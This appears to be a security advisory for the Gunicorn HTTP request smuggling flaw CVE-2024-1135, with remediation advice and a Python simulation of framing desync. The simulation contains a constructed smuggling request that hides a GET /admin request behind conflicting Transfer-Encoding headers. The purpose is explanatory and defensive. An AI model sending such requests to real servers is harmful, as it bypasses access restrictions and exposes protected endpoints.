PT-2023-9088 · Gunicorn+4 · Unicorn+4

Published 2023-12-19 · Updated 2025-12-01 · CVE-2024-1135

CVSS v2.0: 7.8 (High)
Vector: AV:N/AC:L/Au:N/C:N/I:C/A:N
Name of the Vulnerable Software and Affected Versions: Gunicorn versions prior to 22.0.0

Description: Gunicorn fails to properly validate Transfer-Encoding headers, leading to HTTP Request Smuggling (HRS) vulnerabilities. By crafting requests with conflicting Transfer-Encoding headers, attackers can bypass security restrictions and access restricted endpoints. The issue lies in Gunicorn's handling of Transfer-Encoding headers: it incorrectly processes requests with multiple, conflicting Transfer-Encoding headers, treating them as chunked regardless of the final encoding specified. A front-end proxy that frames the same request differently (for example by Content-Length) then disagrees with Gunicorn about where one request ends and the next begins, which enables a range of attacks including cache poisoning, session manipulation, and data exposure.
Recommendations: For versions prior to 22.0.0, update to version 22.0.0 or later to resolve the issue. If updating is not possible, as a temporary workaround block access to restricted endpoints via a firewall or other mechanism, and restrict access to endpoints that may be vulnerable to HTTP Request Smuggling attacks until the issue is resolved. Do not let requests that carry a Transfer-Encoding header reach Gunicorn servers until the issue is resolved (for example, have the front-end proxy reject requests with multiple Transfer-Encoding headers or with both Transfer-Encoding and Content-Length).
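The following is an added illustration of the framing disagreement the description and the workaround above refer to; it is not Gunicorn's code. Three hypothetical framing policies stand in for a front-end proxy (last transfer coding decides), a lenient back end modelled on the advisory text (any "chunked" wins, as in Gunicorn before 22.0.0), and a hardened back end that rejects ambiguous framing outright, which is what a front-end filter implementing the workaround should do. The request bytes, host name and paths are constructed for the demo.

```python
"""Added example, not Gunicorn's code: how conflicting Transfer-Encoding headers
let one byte stream be read as one request by a proxy and two by the back end.
All framing functions and the request bytes below are hypothetical/constructed."""
from typing import Callable, List, Tuple, Union

Header = Tuple[str, str]
Framing = Union[str, int]  # "chunked" or a Content-Length in bytes


class FramingError(ValueError):
    """Ambiguous message framing: reject the request instead of guessing."""


def parse_headers(raw: bytes) -> Tuple[str, List[Header], bytes]:
    """Split one request off a stream: (request line, [(NAME, value)], bytes after the blank line)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().upper(), value.strip()))
    return lines[0], headers, body


def _collect(headers: List[Header]) -> Tuple[List[str], List[str]]:
    """Return (Transfer-Encoding values, Content-Length values) in header order."""
    te = [v for n, v in headers if n == "TRANSFER-ENCODING"]
    cl = [v for n, v in headers if n == "CONTENT-LENGTH"]
    return te, cl


def framing_final_coding(headers: List[Header]) -> Framing:
    """Assumed front-end view: the final transfer coding decides; if it is not
    'chunked', the body is delimited by Content-Length."""
    te, cl = _collect(headers)
    if te and te[-1].split(",")[-1].strip().lower() == "chunked":
        return "chunked"
    return int(cl[-1]) if cl else 0


def framing_lenient(headers: List[Header]) -> Framing:
    """Vulnerable view, modelled on the advisory text: 'chunked' anywhere in any
    Transfer-Encoding header wins, whatever the final coding or Content-Length says."""
    te, cl = _collect(headers)
    if any("chunked" in v.lower() for v in te):
        return "chunked"
    return int(cl[-1]) if cl else 0


def framing_strict(headers: List[Header]) -> Framing:
    """Hardened view: at most one Transfer-Encoding header, 'chunked' exactly once
    and last, never alongside Content-Length, and no repeated Content-Length."""
    te, cl = _collect(headers)
    if len(cl) > 1 or any(not v.isdigit() for v in cl):
        raise FramingError("bad or repeated Content-Length")
    if not te:
        return int(cl[0]) if cl else 0
    if len(te) > 1:
        raise FramingError("multiple Transfer-Encoding headers")
    codings = [c.strip().lower() for c in te[0].split(",")]
    if codings.count("chunked") != 1 or codings[-1] != "chunked":
        raise FramingError("chunked must be the single, final transfer coding")
    if cl:
        raise FramingError("Transfer-Encoding together with Content-Length")
    return "chunked"


def read_chunked(body: bytes) -> Tuple[bytes, bytes]:
    """Consume a chunked body (no trailers assumed); return (decoded, leftover bytes)."""
    decoded, rest = b"", body
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            _, _, rest = rest.partition(b"\r\n")  # empty trailer line ends the body
            return decoded, rest
        decoded, rest = decoded + rest[:size], rest[size + 2:]


def split_requests(stream: bytes, framing: Callable[[List[Header]], Framing]) -> List[str]:
    """Walk a connection's bytes the way a server would, using `framing` to find each
    body's end. Returns the request lines seen; more than one means a desync."""
    seen, rest = [], stream
    while rest:
        request_line, headers, body = parse_headers(rest)
        length = framing(headers)
        rest = read_chunked(body)[1] if length == "chunked" else body[length:]
        seen.append(request_line)
    return seen


# Constructed attack: the proxy only allows /public, the back end also serves /admin.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: app.internal\r\n\r\n"
BODY = b"0\r\n\r\n" + SMUGGLED  # zero-size chunk, then the hidden request
ATTACK_STREAM = (
    b"POST /public HTTP/1.1\r\nHost: app.internal\r\n"
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\nTransfer-Encoding: identity\r\n\r\n" + BODY
)

if __name__ == "__main__":
    print("proxy sees   :", split_requests(ATTACK_STREAM, framing_final_coding))
    print("lenient sees :", split_requests(ATTACK_STREAM, framing_lenient))
    try:
        split_requests(ATTACK_STREAM, framing_strict)
    except FramingError as exc:
        print("strict rejects:", exc)
```

The proxy, framing by Content-Length, forwards the whole stream as a single POST to /public; the lenient back end ends the body at the zero-size chunk and serves the trailing GET /admin as a second request, which is the restricted-endpoint bypass the description names. The strict policy refuses the request entirely, which is the correct response to any conflict between Transfer-Encoding and Content-Length: picking a winner is what creates the desync.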

Weakness Enumeration

HTTP Request/Response Smuggling (CWE-444)

Related Identifiers

ALT-PU-2024-15877
ALT-PU-2024-16006
ALT-PU-2024-16232
BDU:2024-03553
CVE-2024-1135
DLA-3851-1
DLA-3996-1
GHSA-W3H3-4RJ7-4PH4
MGASA-2024-0236
OPENSUSE-SU-2024:13891-1
OPENSUSE-SU-2024_1440-1
RHSA-2024:2727
RHSA-2024:3781
RHSA-2024:4054
RHSA-2024:7987
RHSA-2025:1335
SUSE-SU-2024:1440-1
SUSE-SU-2024:2881-1
SUSE-SU-2024_1440-1
SUSE-SU-2024_2881-1

Affected Products

Alt Linux
Astra Linux
Unicorn
Red Os
Suse